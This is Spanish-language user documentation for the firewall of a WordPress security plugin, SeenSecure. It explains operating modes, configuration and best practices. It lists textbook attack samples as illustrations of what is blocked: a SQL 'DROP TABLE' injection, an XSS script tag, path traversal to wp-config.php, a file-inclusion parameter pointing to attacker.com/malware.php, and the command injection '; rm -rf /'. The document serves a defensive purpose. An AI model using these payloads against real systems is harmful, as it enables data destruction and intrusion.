Firewall: La Puerta de Entrada Protegida
Un firewall es como un guardia en la entrada de tu sitio. Examina cada visitante (solicitud HTTP) antes de permitir entrar:
- ¿De dónde vienes? (IP)
- ¿Qué intentas hacer? (URL, tipo de request)
- ¿Cómo te comportas? (patrón de acceso)
Basándose en estas preguntas, el firewall decide: permitir, desafiar (CAPTCHA), o bloquear.
Selección de Modo
El Firewall ofrece diferentes modos de operación según tus necesidades de seguridad. Cada modo determina cuándo el firewall bloquea tráfico y cuándo permite el acceso.
¿Cómo Elegir el Modo Adecuado?
La selección del modo depende de tu situación específica:
- Recién instalado: Comienza en Monitoring para observar
- En producción: Protection es el modo estándar
- En crisis: Strict para máxima protección
- En desarrollo: Off para no afectar trabajo
Proceso Recomendado
- OFF → MONITOR: Primeros días para aprender
- MONITOR → LEARNING: Una semana para adaptar
- LEARNING → PROTECTION: Modo estándar permanente
- PROTECTION → STRICT: Solo si es necesario
Modos de Operación del Firewall
El Firewall tiene diferentes "modos" según tu necesidad. Cada modo cambia cuándo bloquea.
1. Modo OFF (Desactivado)
Qué hace: Nada. Firewall no está activo.
Cuándo usar: Nunca en producción. Solo durante desarrollo inicial.
2. Modo MONITOR (Observar)
Qué hace: Registra actividad sospechosa pero NO bloquea. Solo vigila.
Comportamiento: Todos acceden, pero firewall registra "esto sería bloqueado si..."
Cuándo usar:
- Primeros días después de instalar SeenSecure
- Para aprender qué es normal vs sospechoso en tu sitio
- Antes de cambiar a modo más agresivo
3. Modo LEARNING (Aprender)
Qué hace: Firewall aprende qué es normal en tu sitio, bloquea solo obviamente malicioso.
Comportamiento: 95% del tráfico legítimo pasa. Solo bloquea SQL Injection, XSS, Path Traversal claros.
Cuándo usar: Después de Monitor, cuando confías en instalación.
Duración: Al menos 1 semana en este modo.
4. Modo PROTECTION (Protección Normal)
Qué hace: Balance: bloquea real attacks pero permite tráfico legítimo.
Comportamiento: Ataca bloqueados, tráfico normal pasa.
Cuándo usar: Sitios en producción normal. Defensa estándar.
5. Modo STRICT (Estricto)
Qué hace: Máxima protección. Bloquea cualquier cosa ligeramente sospechosa.
Comportamiento: Puede haber falsos positivos (usuarios legítimos bloqueados).
Cuándo usar:
- Sitio bajo ataque activo
- Sitio muy crítico (banking, healthcare)
- Después de haber sido hackeado
OFF
❌ No usar en producción
MONITOR
✓ Primeros días
LEARNING
✓ Semana 1-4
PROTECTION
✓ Estándar recomendado
STRICT
✓ Solo en crisis
¿Qué Protege el Firewall?
SQL Injection (SQLi)
Ataque donde atacante inyecta código SQL para acceder a base de datos.
Ejemplo: Envía: "; DROP TABLE users; --
Defensa: Firewall detecta patrón, bloquea antes de llegar a BD.
Cross-Site Scripting (XSS)
Inyección de JavaScript malicioso que se ejecuta en navegador de usuarios.
Ejemplo: Envía: <script>alert('Hackeado')</script>
Defensa: Detecta tags maliciosos, limpia antes de mostrar.
Path Traversal
Intento de acceder archivos fuera de directorio permitido.
Ejemplo: URL: /../../wp-config.php
Defensa: Bloquea ".." y acceso a paths sensibles.
Remote File Inclusion (RFI)
Carga archivos maliciosos desde servidores externos.
Ejemplo: ?file=http://attacker.com/malware.php
Defensa: Bloquea URLs externas en parámetros.
Local File Inclusion (LFI)
Lee archivos locales del servidor.
Defensa: Valida parámetros de archivos.
Directory Listing
Acceso a carpetas sin index.html, permitiendo ver contenido.
Defensa: Bloquea enumeración de directorios.
Command Injection
Inyección de comandos del sistema operativo.
Ejemplo: ; rm -rf /
Defensa: Bloquea caracteres especiales de comandos.
XML External Entity (XXE)
Ataque contra procesadores XML.
Defensa: Deshabilita entidades externas.
| Tipo de Ataque | Severidad | Modo para Bloquear |
|---|---|---|
| SQL Injection | ⭐⭐⭐⭐⭐ | Monitor+ |
| XSS | ⭐⭐⭐⭐ | Monitor+ |
| Path Traversal | ⭐⭐⭐ | Learning+ |
| RFI/LFI | ⭐⭐⭐⭐ | Monitor+ |
Cómo Activar y Configurar el Firewall
Paso 1: Activar Firewall
SeenSecure > Firewall > Estado: Habilitar
Paso 2: Seleccionar Modo
SeenSecure > Firewall > Modo: [OFF | MONITOR | LEARNING | PROTECTION | STRICT]
Recomendación: Comienza con MONITOR durante 48 horas.
Paso 3: Revisar Logs
SeenSecure > Monitoreo > Firewall Activity
¿Ves muchos falsos positivos? ¿Usuarios legítimos bloqueados? Ajusta settings.
Paso 4: Configurar Sensibilidad
- Agresividad: Qué tan fácil bloquea (0-100%)
- Modo Query String: Cómo analiza parámetros URL
- Modo POST Body: Cómo analiza datos POST
Paso 5: Definir Exclusiones (Opcional)
Si hay requests que Firewall bloquea incorrectamente:
- Whitelist URL específica
- Whitelist parámetro específico
Paso 6: Escalar a Modo Production
- Día 1-3: MONITOR
- Día 4-7: LEARNING
- Semana 2+: PROTECTION (recomendado permanente)
Mejores Prácticas
Activación Gradual
- Instala SeenSecure
- Firewall OFF durante 1 día (validar funcionalidad)
- Firewall MONITOR durante 2-3 días
- Firewall LEARNING durante 1 semana
- Firewall PROTECTION indefinidamente
Monitoreo Continuo
- Revisa logs 2-3 veces por semana inicialmente
- Después, 1 vez por semana
- Si ves patrón nuevo, investiga
Ajustes Según Tipo de Sitio
- Blog Simple: PROTECTION con sensibilidad media
- E-commerce: PROTECTION con sensibilidad alta en /checkout
- SaaS: PROTECTION con sensibilidad muy alta
- Crítico: STRICT durante horario de operación
Comunicación a Usuarios
Si Firewall bloquea usuario legítimo:
- Recibe mensaje de error descriptivo
- Explica que fue bloqueado por seguridad
- Ofrece contacto de soporte